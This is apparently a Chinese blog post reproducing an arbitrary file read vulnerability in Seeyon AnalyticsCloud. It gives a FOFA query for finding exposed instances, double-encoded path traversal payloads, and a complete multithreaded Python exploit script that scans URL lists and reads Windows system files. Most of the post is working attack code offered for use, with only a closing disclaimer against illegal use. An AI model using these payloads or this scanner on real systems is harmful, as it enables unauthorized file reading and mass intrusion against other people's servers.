致遠AnalyticsCloud分析雲任意檔案讀取漏洞復現

Fengzun發表於2024-07-28
Cloud

產品介面圖:

FOFA:"AnalyticsCloud分析雲"

GET請求payload即可讀取檔案內容

paylaod:
/.%252e/.%252e/c:/windows/win.ini

/a/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c:/windows/win.ini

EXP:

import requests
import argparse
import urllib3
import warnings
import threading
import time


# 忽略目標計算機積極關閉的問題
requests.packages.urllib3.disable_warnings()

# 忽略SSL證書驗證的問題
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
    'Cache-Control': 'max-age=0',
    'Sec-Ch-Ua': '"Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
}


payload = "/a/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c:/windows/win.ini"

def ACloud(url):
    url = url.rstrip("/")
    AC_url = url + payload
    try:
        AC_re = requests.get(AC_url, headers=headers, verify=False, timeout=1)
        if "[fonts]" in AC_re.text:
            print("\033[32m[+]" + "漏洞存在,請訪問" + AC_url + "\033[0m")
    except Exception as e:
        print("漏洞不存在或請求失敗")

def ACloud_Scan_file(url):
    url = url.rstrip("/")
    ACfile_url = url + payload
    try:
        ACfile_re = requests.get(ACfile_url, headers=headers, verify=False, timeout=1)
        if "[fonts]" in ACfile_re.text:
            result = "\033[32m[+]" + ACfile_url + "\033[0m"

        #防止同一個目標多次輸出
        if result not in ACloud_Scan_urls:
            ACloud_Scan_urls.add(result)
            print(result)

    except Exception as e:
        print("\033[31m[-]" + url + "\033[0m")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="2024.07.06")
    parser.add_argument('-u', '--url'.strip(), help='eg: -u http://www.xx.com')
    parser.add_argument('-f', '--file'.strip(), help='eg: -f urls.txt')
    args = parser.parse_args()

    if (args.url):
        ACloud(args.url)

    elif (args.file):
        with open(args.file,'r') as f:
            ACloud_urls = [line.strip() for line in f if line.strip()]
            ACloud_Scan_urls = set()
        threads = []

        for AC_url in ACloud_urls:
            thread = threading.Thread(target=ACloud_Scan_file, args=(AC_url,))
            thread.start()
            threads.append(thread)

        for thread in threads:
            thread.join()

    else:
            print(parser.format_help())

宣告:漏洞利用指令碼僅供學習參考,請遵守相關法律法規,切勿非法滲透,後果自負。

相關文章